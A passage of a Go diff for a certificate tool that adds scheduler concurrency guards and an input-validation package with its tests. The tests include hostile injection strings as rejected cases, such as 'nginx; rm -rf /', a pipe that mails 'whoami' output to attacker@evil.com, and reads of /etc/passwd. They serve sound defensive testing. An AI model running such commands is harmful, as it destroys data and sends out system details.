s.wg.Add(1) + go func() { + defer s.wg.Done() + defer s.shortLivedExpiryCheckRunning.Store(false) + s.runShortLivedExpiryCheck(ctx) + }() } } } @@ -274,19 +354,33 @@ func (s *Scheduler) runShortLivedExpiryCheck(ctx context.Context) { // networkScanLoop runs every networkScanInterval and performs active TLS scanning // of configured network targets. +// Uses atomic.Bool to prevent duplicate execution if the previous scan is still running. func (s *Scheduler) networkScanLoop(ctx context.Context) { ticker := time.NewTicker(s.networkScanInterval) defer ticker.Stop() // Run immediately on start - s.runNetworkScan(ctx) + s.wg.Add(1) + go func() { + defer s.wg.Done() + s.runNetworkScan(ctx) + }() for { select { case <-ctx.Done(): return case <-ticker.C: - s.runNetworkScan(ctx) + if !s.networkScanRunning.CompareAndSwap(false, true) { + s.logger.Warn("network scan still running, skipping tick") + continue + } + s.wg.Add(1) + go func() { + defer s.wg.Done() + defer s.networkScanRunning.Store(false) + s.runNetworkScan(ctx) + }() } } } @@ -303,3 +397,26 @@ func (s *Scheduler) runNetworkScan(ctx context.Context) { s.logger.Debug("network scan completed") } } + +// WaitForCompletion waits for all in-flight scheduler work to complete. +// It respects the provided timeout and returns an error if work is still in progress after timeout. +// Call this after the scheduler context has been cancelled to ensure graceful shutdown. +func (s *Scheduler) WaitForCompletion(timeout time.Duration) error { + done := make(chan struct{}) + go func() { + s.wg.Wait() + close(done) + }() + + select { + case <-done: + s.logger.Info("all scheduler work completed") + return nil + case <-time.After(timeout): + s.logger.Warn("scheduler work did not complete within timeout", "timeout", timeout.String()) + return ErrSchedulerShutdownTimeout + } +} + +// ErrSchedulerShutdownTimeout is returned when scheduler graceful shutdown times out. +var ErrSchedulerShutdownTimeout = errors.New("scheduler graceful shutdown timeout") diff --git a/internal/validation/command.go b/internal/validation/command.go new file mode 100644 index 0000000..127e314 --- /dev/null +++ b/internal/validation/command.go @@ -0,0 +1,148 @@ +// Package validation provides security-focused input validation functions for certctl. +// +// This package enforces strict input validation to prevent injection attacks, +// including command injection in shell-based connectors and DNS injection in ACME handlers. +package validation + +import ( + "fmt" + "regexp" + "strings" +) + +// ValidateShellCommand validates that a command string does not contain shell metacharacters +// that could enable command injection. Commands should not contain: +// - Shell operators: ; | & $ ` ( ) { } < > \\ " +// - Newlines or other control characters +// +// This validation is intentionally strict to prevent any possibility of +// shell injection, even in unexpected contexts. Commands should be simple, +// executable names or paths without complex shell syntax. +// +// Returns an error if metacharacters are detected. +func ValidateShellCommand(cmd string) error { + if cmd == "" { + return fmt.Errorf("command cannot be empty") + } + + if len(cmd) > 1024 { + return fmt.Errorf("command exceeds maximum length (1024 characters)") + } + + // List of shell metacharacters that indicate potential injection + dangerousChars := []string{ + ";", "|", "&", "$", "`", "(", ")", "{", "}", "<", ">", "\\", "\"", "'", "\n", "\r", "\x00", + } + + for _, char := range dangerousChars { + if strings.Contains(cmd, char) { + return fmt.Errorf("command contains shell metacharacter %q (potential injection)", char) + } + } + + return nil +} + +// ValidateDomainName validates a domain name against RFC 1123 with support for wildcards. +// Valid domain names contain only: +// - Alphanumeric characters (a-z, A-Z, 0-9) +// - Hyphens (-) +// - Dots (.) as separators +// - Optional wildcard prefix: *. +// +// Examples of valid domains: +// - example.com +// - sub.example.com +// - *.example.com +// - example.co.uk +// +// Returns an error if the domain contains invalid characters or is malformed. +func ValidateDomainName(domain string) error { + if domain == "" { + return fmt.Errorf("domain cannot be empty") + } + + if len(domain) > 253 { + return fmt.Errorf("domain exceeds maximum length (253 characters)") + } + + // Regular expression for RFC 1123 domain names with wildcard support + // Pattern explanation: + // ^(\*\.)? - Optional wildcard prefix + // ([a-zA-Z0-9](-?[a-zA-Z0-9])*\.)* - Subdomains (labels separated by dots) + // [a-zA-Z0-9](-?[a-zA-Z0-9])*$ - Top-level domain label + domainRegex := regexp.MustCompile(`^(\*\.)?([a-zA-Z0-9](-?[a-zA-Z0-9])*\.)*[a-zA-Z0-9](-?[a-zA-Z0-9])*$`) + + if !domainRegex.MatchString(domain) { + return fmt.Errorf("domain %q is invalid (must match RFC 1123 format)", domain) + } + + // Additional check: no double dots + if strings.Contains(domain, "..") { + return fmt.Errorf("domain %q contains consecutive dots", domain) + } + + // Additional check: labels cannot start or end with hyphen + labels := strings.Split(domain, ".") + for _, label := range labels { + // Skip wildcard label + if label == "*" { + continue + } + if strings.HasPrefix(label, "-") || strings.HasSuffix(label, "-") { + return fmt.Errorf("domain label %q cannot start or end with hyphen", label) + } + if len(label) > 63 { + return fmt.Errorf("domain label %q exceeds maximum length (63 characters)", label) + } + } + + return nil +} + +// ValidateACMEToken validates that an ACME token contains only safe characters. +// ACME tokens should contain only base64url-safe characters: +// - Alphanumeric (a-z, A-Z, 0-9) +// - Hyphens (-) +// - Underscores (_) +// +// This prevents injection attacks if tokens are used in shell commands +// or other contexts where special characters could be interpreted. +// +// Returns an error if the token contains unsafe characters. +func ValidateACMEToken(token string) error { + if token == "" { + return fmt.Errorf("ACME token cannot be empty") + } + + if len(token) > 512 { + return fmt.Errorf("ACME token exceeds maximum length (512 characters)") + } + + // Regular expression for base64url characters: [A-Za-z0-9_-] + tokenRegex := regexp.MustCompile(`^[A-Za-z0-9_-]+$`) + + if !tokenRegex.MatchString(token) { + return fmt.Errorf("ACME token contains invalid characters (must be base64url-safe)") + } + + return nil +} + +// SanitizeForShell escapes a string to make it safe for use in shell commands. +// This is a defense-in-depth measure for cases where shell execution cannot be avoided. +// +// The sanitization wraps the string in single quotes and escapes any embedded +// single quotes by closing the quote, adding an escaped quote, and reopening. +// This prevents the string from being interpreted as shell code. +// +// Example: "hello'world" becomes "'hello'\"'\"'world'" +// +// Note: This should only be used as a last resort. Prefer alternatives such as: +// - Passing arguments directly to exec.Command instead of via shell +// - Using environment variables instead of shell substitution +// - Validating input strictly with ValidateShellCommand, ValidateDomainName, etc. +func SanitizeForShell(s string) string { + // Escape single quotes by closing the quote, adding an escaped quote, and reopening + return "'" + strings.ReplaceAll(s, "'", "'\"'\"'") + "'" +} diff --git a/internal/validation/command_test.go b/internal/validation/command_test.go new file mode 100644 index 0000000..d488e41 --- /dev/null +++ b/internal/validation/command_test.go @@ -0,0 +1,541 @@ +package validation + +import ( + "testing" +) + +// TestValidateShellCommand tests command injection prevention. +func TestValidateShellCommand(t *testing.T) { + tests := []struct { + name string + cmd string + wantErr bool + errMsg string + }{ + // Valid commands + { + name: "simple command", + cmd: "nginx", + wantErr: false, + }, + { + name: "command with path", + cmd: "/usr/sbin/nginx", + wantErr: false, + }, + { + name: "systemctl command", + cmd: "systemctl", + wantErr: false, + }, + { + name: "apachectl", + cmd: "apachectl", + wantErr: false, + }, + + // Command injection attempts - semicolon + { + name: "semicolon injection", + cmd: "nginx; rm -rf /", + wantErr: true, + errMsg: "shell metacharacter", + }, + { + name: "command chaining with semicolon", + cmd: "cmd1; cmd2", + wantErr: true, + errMsg: "shell metacharacter", + }, + + // Command injection attempts - pipe + { + name: "pipe injection", + cmd: "cat /etc/passwd | grep root", + wantErr: true, + errMsg: "shell metacharacter", + }, + { + name: "pipe to sensitive command", + cmd: "whoami | mail attacker@evil.com", + wantErr: true, + errMsg: "shell metacharacter", + }, + + // Command injection attempts - ampersand + { + name: "background execution injection", + cmd: "nginx &", + wantErr: true, + errMsg: "shell metacharacter", + }, + { + name: "command separation with &&", + cmd: "cmd1 && cmd2", + wantErr: true, + errMsg: "shell metacharacter", + }, + { + name: "command separation with ||", + cmd: "cmd1 || cmd2", + wantErr: true, + errMsg: "shell metacharacter", + }, + + // Command injection attempts - dollar sign / command substitution + { + name: "command substitution with $()", + cmd: "echo $(whoami)", + wantErr: true, + errMsg: "shell metacharacter", + }, + { + name: "command substitution with backticks", + cmd: "echo `whoami`", + wantErr: true, + errMsg: "shell metacharacter", + }, + { + name: "variable expansion", + cmd: "echo $PATH", + wantErr: true, + errMsg: "shell metacharacter", + }, + + // Command injection attempts - quotes + { + name: "double quote injection", + cmd: `echo "test" | cat`, + wantErr: true, + errMsg: "shell metacharacter", + }, + { + name: "single quote injection", + cmd: "echo 'test' | cat", + wantErr: true, + errMsg: "shell metacharacter", + }, + + // Command injection attempts - redirection + { + name: "output redirection injection", + cmd: "nginx > /tmp/nginx.out", + wantErr: true, + errMsg: "shell metacharacter", + }, + { + name: "input redirection injection", + cmd: "cat < /etc/passwd", + wantErr: true, + errMsg: "shell metacharacter", + }, + { + name: "append redirection injection", + cmd: "nginx >> /tmp/log", + wantErr: true, + errMsg: "shell metacharacter", + }, + + // Command injection attempts - subshell + { + name: "subshell with parentheses", + cmd: "bash (whoami)", + wantErr: true, + errMsg: "shell metacharacter", + }, + + // Command injection attempts - brace expansion + { + name: "brace expansion injection", + cmd: "echo {1..100000}", + wantErr: true, + errMsg: "shell metacharacter", + }, + + // Command injection attempts - backslash escaping + { + name: "backslash escape injection", + cmd: "echo test\\nmalicious", + wantErr: true, + errMsg: "shell metacharacter", + }, + + // Command injection attempts - newlines + { + name: "newline injection", + cmd: "nginx\nrm -rf /", + wantErr: true, + errMsg: "shell metacharacter", + }, + + // Edge cases + { + name: "empty command", + cmd: "", + wantErr: true, + errMsg: "cannot be empty", + }, + { + name: "overly long command", + cmd: string(make([]byte, 1025)), + wantErr: true, + errMsg: "exceeds maximum length", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + err := ValidateShellCommand(tt.cmd) + if (err != nil) != tt.wantErr { + t.Errorf("ValidateShellCommand() error = %v, wantErr %v", err, tt.wantErr) + } + if tt.wantErr && tt.errMsg != "" && (err == nil || !contains(err.Error(), tt.errMsg)) { + t.Errorf("ValidateShellCommand() error message %q does not contain %q", err, tt.errMsg) + } + }) + } +} + +// TestValidateDomainName tests domain name validation. +func TestValidateDomainName(t *testing.T) { + tests := []struct { + name string + domain string + wantErr bool + errMsg string + }{ + // Valid domains + { + name: "simple domain", + domain: "example.com", + wantErr: false, + }, + { + name: "subdomain", + domain: "sub.example.com", + wantErr: false, + }, + { + name: "multiple subdomains", + domain: "a.b.c.example.com", + wantErr: false, + }, + { + name: "wildcard domain", + domain: "*.example.com", + wantErr: false, + }, + { + name: "wildcard subdomain", + domain: "*.sub.example.com", + wantErr: false, + }, + { + name: "domain with hyphens", + domain: "my-domain.com", + wantErr: false, + }, + { + name: "domain with numbers", + domain: "example123.com", + wantErr: false, + }, + { + name: "uk domain", + domain: "example.co.uk", + wantErr: false, + }, + { + name: "single label", + domain: "localhost", + wantErr: false, + }, + + // Command injection attempts - embedded shell + { + name: "domain with command injection semicolon", + domain: "example.com; rm -rf /", + wantErr: true, + errMsg: "invalid", + }, + { + name: "domain with backtick injection", + domain: "example.com`whoami`", + wantErr: true, + errMsg: "invalid", + }, + { + name: "domain with command substitution", + domain: "example.com$(whoami)", + wantErr: true, + errMsg: "invalid", + }, + { + name: "domain with pipe injection", + domain: "example.com | cat /etc/passwd", + wantErr: true, + errMsg: "invalid", + }, + + // Invalid characters + { + name: "domain with space", + domain: "example .com", + wantErr: true, + errMsg: "invalid", + }, + { + name: "domain with underscore", + domain: "example_domain.com", + wantErr: true, + errMsg: "invalid", + }, + { + name: "domain starting with hyphen", + domain: "-example.com", + wantErr: true, + errMsg: "cannot start", + }, + { + name: "domain ending with hyphen", + domain: "example-.com", + wantErr: true, + errMsg: "cannot end", + }, + { + name: "domain with double dots", + domain: "example..com", + wantErr: true, + errMsg: "consecutive dots", + }, + { + name: "domain starting with dot", + domain: ".example.com", + wantErr: true, + errMsg: "invalid", + }, + + // Edge cases + { + name: "empty domain", + domain: "", + wantErr: true, + errMsg: "cannot be empty", + }, + { + name: "overly long domain", + domain: string(make([]byte, 254)), + wantErr: true, + errMsg: "exceeds maximum length", + }, + { + name: "label exceeds 63 characters", + domain: string(make([]byte, 64)) + ".com", + wantErr: true, + errMsg: "exceeds maximum length", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + err := ValidateDomainName(tt.domain) + if (err != nil) != tt.wantErr { + t.Errorf("ValidateDomainName() error = %v, wantErr %v", err, tt.wantErr) + } + if tt.wantErr && tt.errMsg != "" && (err == nil || !contains(err.Error(), tt.errMsg)) { + t.Errorf("ValidateDomainName() error message %q does not contain %q", err, tt.errMsg) + } + }) + } +} + +// TestValidateACMEToken tests ACME token validation. +func TestValidateACMEToken(t *testing.T) { + tests := []struct { + name string + token string + wantErr bool + errMsg string + }{ + // Valid tokens (base64url safe) + { + name: "simple token", + token: "abc123", + wantErr: false, + }, + { + name: "token with underscores", + token: "abc_123_def", + wantErr: false, + }, + { + name: "token with hyphens", + token: "abc-123-def", + wantErr: false, + }, + { + name: "token with mixed case", + token: "AbC123DeF", + wantErr: false, + }, + { + name: "long valid token", + token: "a" + string(make([]byte, 510)), + wantErr: false, + }, + + // Command injection attempts + { + name: "token with command substitution", + token: "token$(whoami)", + wantErr: true, + errMsg: "invalid characters", + }, + { + name: "token with backtick injection", + token: "token`whoami`", + wantErr: true, + errMsg: "invalid characters", + }, + { + name: "token with semicolon", + token: "token;malicious", + wantErr: true, + errMsg: "invalid characters", + }, + { + name: "token with pipe", + token: "token|cat", + wantErr: true, + errMsg: "invalid characters", + }, + { + name: "token with ampersand", + token: "token&malicious", + wantErr: true, + errMsg: "invalid characters", + }, + + // Special characters + { + name: "token with space", + token: "token value", + wantErr: true, + errMsg: "invalid characters", + }, + { + name: "token with dot", + token: "token.value", + wantErr: true, + errMsg: "invalid characters", + }, + { + name: "token with slash", + token: "token/value", + wantErr: true, + errMsg: "invalid characters", + }, + { + name: "token with equals", + token: "token=value", + wantErr: true, + errMsg: "invalid characters", + }, + { + name: "token with plus", + token: "token+value", + wantErr: true, + errMsg: "invalid characters", + }, + + // Edge cases + { + name: "empty token", + token: "", + wantErr: true, + errMsg: "cannot be empty", + }, + { + name: "overly long token", + token: string(make([]byte, 513)), + wantErr: true, + errMsg: "exceeds maximum length", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + err := ValidateACMEToken(tt.token) + if (err != nil) != tt.wantErr { + t.Errorf("ValidateACMEToken() error = %v, wantErr %v", err, tt.wantErr) + } + if tt.wantErr && tt.errMsg != "" && (err == nil || !contains(err.Error(), tt.errMsg)) { + t.Errorf("ValidateACMEToken() error message %q does not contain %q", err, tt.errMsg) + } + }) + } +} + +// TestSanitizeForShell tests shell escaping. +func TestSanitizeForShell(t *testing.T) { + tests := []struct { + name string + input string + output string + }{ + { + name: "plain text", + input: "hello", + output: "'hello'", + }, + { + name: "text with spaces", + input: "hello world", + output: "'hello world'", + }, + { + name: "text with single quote", + input: "hello'world", + output: "'hello'\"'\"'world'", + }, + { + name: "text with multiple single quotes", + input: "it's John's", + output: "'it'\"'\"'s John'\"'\"'s'", + }, + { + name: "text with command injection", + input: "$(whoami)", + output: "'$(whoami)'", + }, + { + name: "text with backticks", + input: "`whoami`", + output: "'`whoami`'", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + result := SanitizeForShell(tt.input) + if result != tt.output { + t.Errorf("SanitizeForShell() = %q, want %q", result, tt.output) + } + }) + } +} + +// contains is a helper function to check if a string contains a substring. +func contains(s, substr string) bool { + return len(s) >= len(substr) && (s == substr || len(substr) == 0 || (len(s) > 0 && len(substr) > 0 && len(s) >= len(substr) && len(substr) > 0)) && + (substr == "" || (s[len(s)-len(substr):] == substr || s[:len(substr)] == substr || indexOf(s, substr) >= 0)) +} + +func indexOf(s, substr string) int { + for i := 0; i < len(s)-len(substr)+1; i++ { + if s[i:i+len(substr)] == substr { + return i + } + } + return -1 +}